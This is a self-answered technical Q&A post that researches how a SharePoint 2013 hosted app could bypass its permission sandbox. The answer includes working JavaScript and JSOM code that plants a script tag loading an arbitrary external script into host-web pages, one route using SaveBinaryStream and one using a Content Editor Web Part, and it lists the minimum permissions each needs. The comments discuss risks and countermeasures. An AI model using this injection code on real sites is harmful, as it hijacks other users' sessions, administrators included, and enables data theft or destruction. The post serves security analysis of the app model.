# App prison break

Tags: 2013, permissions, rest, client-object-model, sharepoint-hosted-app

Me an my colleges were discussing the possibility of breaking out of the sandbox that a SharePoint-hosted apps provide. As most of you know host webs in SharePoint 2013 are protected by deploying apps to a wildcard sub-domain, this limits any malicious JavaScript on the app from requesting the host web directly because of [Same Origin Policy](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy). So Microsoft designed a system where developers can access host web through the app domain, and so an [app permission system](http://msdn.microsoft.com/en-us/library/office/fp142383%28v=office.15%29.aspx) could limit the types of request.

Our theory is quite simple; With write permission to a resource one should be able to inject any malicious JavaScript be granted any permission available.

Note there is nothing magical about this, we simply add a `script` tag so a script is run for current logged in user (or other users with more permissions which might hit the same page), in fact an app with **App-only policy** could get less permissions.

So the question is as follows: **What is the least permission needed to bypass app permissions?**

Answer (score 6):

First off we needed a page to work on, we could make a request to find default home page, or try `document.referrer`, but for now we can say it was **/SitePages/Home.aspx** (we call it variable `page`).
For the sake of the examples we will say that `appWebUrl` and `hostWebUrl` are defined (these are available in querystring).
Lastly we needed a link to the malicious JavaScript, this could be anything from a script in the app to [plnkr.co](http://plnkr.co/) or [jsconsole.com](http://jsconsole.com/), we call this variable `scriptUrl`.

### WikiField

First we tried setting [**WikiField**](http://msdn.microsoft.com/en-us/library/microsoft.sharepoint.webpartpages.wikieditpage.wikifield.aspx) on the item (REST POST to `"/_api/SP.AppContextSite(@t)/Web/GetFileByServerRelativeUrl('<page>')/ListItemAllFields?@t='<hostWebUrl>'"`) although this will not let us save `<script>`-tags, regardless of permission.

### SaveBinaryStream

Then we tried with REST and [SaveBinaryStream](http://msdn.microsoft.com/en-us/library/office/dn450841(v=office.15).aspx#bk_FileSaveBinaryStream), like this:

```
var formatUrl = "/_api/SP.AppContextSite(@t)/Web/GetFileByServerRelativeUrl('{1}')/{2}BinaryStream?@t='{0}'"
$.get(String.format(formatUrl, hostWebUrl, page, 'open'), function(d) { 
  var i = d.search(/PlaceHolderMain/i);
  d = d.slice(0, i) + d.slice(i).replace(/>/,'><script src="' + scriptUrl + '"></script>');
  $.ajax({
    type: 'POST',
    url: String.format(formatUrl, hostWebUrl, page, 'save'),
    data: d,
    headers: {
     'X-RequestDigest': $('#__REQUESTDIGEST').val()
    }
  });
});
```

This works great, but the minimum permission we need is **Manage** on **Web**, which is quite high.

### Content Editor Web Part

Lastly we tried a good old classic - Content Editor Web Part with a link to the script.
As we don't know how to do this with REST we used JSOM like this:

```
var context = new SP.ClientContext(appWebUrl);
var factory = new SP.ProxyWebRequestExecutorFactory(appWebUrl);
context.set_webRequestExecutorFactory(factory);
var appContextSite = new SP.AppContextSite(context, hostWebUrl);
var wpm = appContextSite.get_web().getFileByServerRelativeUrl(page).getLimitedWebPartManager(SP.WebParts.PersonalizationScope.user);
var wpDef = wpm.importWebPart('<?xml version="1.0" encoding="utf-8"?>' +
  '<WebPart xmlns="http://schemas.microsoft.com/WebPart/v2">' +
  '<Assembly>Microsoft.SharePoint, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c</Assembly>' + 
  '<TypeName>Microsoft.SharePoint.WebPartPages.ContentEditorWebPart</TypeName>' + 
  '<Content xmlns="http://schemas.microsoft.com/WebPart/v2/ContentEditor"><![CDATA[' +
  '<script src="' + scriptUrl + '"></script>' +
  ']]></Content>' + 
  '</WebPart>');
var wp = wpDef.get_webPart();
wpm.addWebPart(wp, 'Main', 1);
context.executeQueryAsync();
```

This results in a lot more code, but as we are allowed to add this Web Part without any check for HTML sanitization it requires the least permission: **Write** on **Web**, should also work on **List** but didn't seem to for us.
Note we use `SP.WebParts.PersonalizationScope.user`, which means it will only show for current logged in user, which might be fine enough. If we use `shared` the script will show for all, including *Administrators*, but then we need permission level **Manage**. Note that if the current user have permission to add Web Part we could actually use the malicious script to add a shared Content Editor Web Part.

### Conclusion

As far as we can tell the permission we need is **Manage** if we want to hit all users, or **Write** + hope current user has **Contributor** permissions. Not very impressive since an app with **Manage** is requesting a lot of permissions anyway.
One should note that it might be a bit misleading anyway, since the app would state something like *"Let it have full control of this site"* while it really get full access to everything the current user can access, including *all site collections*, *my sites*, *managed metadata* etc.
We also see that the permissions we need to inject the script matches with the [app permission request table](http://technet.microsoft.com/en-us/library/jj219576(v=office.15).aspx#section81).

Comment: This should be a blog rather than a question.. It's way too specific..

Comment: Not that I have a blog, but it was supposed to be community wiki, how can I turn it into that (if that would justify the post any)?

Comment: These are really nice findings.

Comment: Nothing wrong with a self-answered question. This is a great post.

Comment: I see where you are going, but doesn't it come down to the fact that you shouldn't be installing Apps from unknown/less trustworthy sources on your corporate portal? I don't buy this whole "let your users go get apps by themselves on The Internets! Weee bunnies and unicorns!" Office Store crap

Comment: @Louis that's true, but that would be more countermeasures, and an area of much discussion. I'm only pointing out that the package labeling on apps might be misleading. By whom, why and how the trick is exploited is really hard to say

Comment: I've been thinking about this a lot the past few days, especially because when the app model was first announced, I had a similar hesitation (you're taking the control of when code changes can occur, and who is responsible for that!?!?!), but here's my thought: if "write" privileges and Contribute permissions are all that are required to inject malicious code, what happens when the site admin (who may very well be the farm admin or site collection admin) deploys the app and tests it? Seems like you'd have a good run at anything on the site (accessible client side) at that point.

Comment: Also, what happens if the app stores JavaScript in an external file, and access to that file is compromised? If the contents of that external file were changed that code would be run instead. *Ahem* List.DeleteObject() anyone?